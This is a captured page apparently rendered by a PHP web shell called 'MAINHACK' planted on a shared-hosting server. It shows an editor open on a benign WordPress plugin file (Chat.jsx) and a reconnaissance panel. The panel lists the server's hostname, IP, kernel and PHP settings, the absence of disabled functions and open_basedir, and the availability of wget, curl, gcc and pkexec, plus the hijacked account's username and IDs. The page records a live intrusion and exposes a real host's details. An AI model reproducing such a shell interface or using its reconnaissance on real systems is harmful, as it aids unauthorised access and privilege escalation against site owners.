[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Chat.jsx
import { DOMHighlighter } from '@agent/components/DOMHighlighter'; import { DragResizeLayout } from '@agent/components/layouts/DragResizeLayout'; import { MobileLayout } from '@agent/components/layouts/MobileLayout'; import { useGlobalStore } from '@agent/state/global'; import { useWorkflowStore } from '@agent/state/workflows'; import { useEffect } from '@wordpress/element'; import { SidebarLayout } from './components/layouts/SidebarLayout'; export const Chat = ({ busy, children }) => { const { setIsMobile, isMobile, mode } = useGlobalStore(); const { domToolEnabled, block, setBlock, setDomToolEnabled } = useWorkflowStore(); useEffect(() => { if (!isMobile || !block) return; // Remove the block if we switch to mobile setBlock(null); }, [isMobile, setIsMobile, block, setBlock]); useEffect(() => { let timeout; const onResize = () => { clearTimeout(timeout); timeout = window.setTimeout(() => { setIsMobile(window.innerWidth < 783); }, 10); }; window.addEventListener('resize', onResize); return () => { clearTimeout(timeout); window.removeEventListener('resize', onResize); }; }, [setIsMobile]); useEffect(() => { // Exit select mode when Escape is pressed const onKeyDown = (e) => { if (e.key !== 'Escape' || !domToolEnabled) return; // Cancel the workflow window.dispatchEvent(new CustomEvent('extendify-agent:cancel-workflow')); // If a block is selected, clear it if (block) return setBlock(null); // If no block is selected, exit select mode setDomToolEnabled(false); }; window.addEventListener('keydown', onKeyDown); return () => { window.removeEventListener('keydown', onKeyDown); }; }, [domToolEnabled, block, setBlock, setDomToolEnabled]); if (isMobile) { return ( <MobileLayout> <div id="extendify-agent-chat" className="flex min-h-0 flex-1 grow flex-col font-sans" > {children} </div> </MobileLayout> ); } if (mode === 'docked-left') { return ( <SidebarLayout> <div id="extendify-agent-chat" className="flex min-h-0 flex-1 grow flex-col font-sans" > {children} </div> {domToolEnabled && <DOMHighlighter busy={busy} />} </SidebarLayout> ); } return ( <DragResizeLayout> <div id="extendify-agent-chat" className="flex min-h-0 flex-1 grow flex-col font-sans" > {children} </div> {domToolEnabled && <DOMHighlighter busy={busy} />} </DragResizeLayout> ); };
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium56.web-hosting.com
Server IP: 198.54.119.70
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium56.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 70.53 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: bkunreyz
User ID (UID): 830
Group ID (GID): 826
Script Owner UID: 830
Current Dir Owner: 830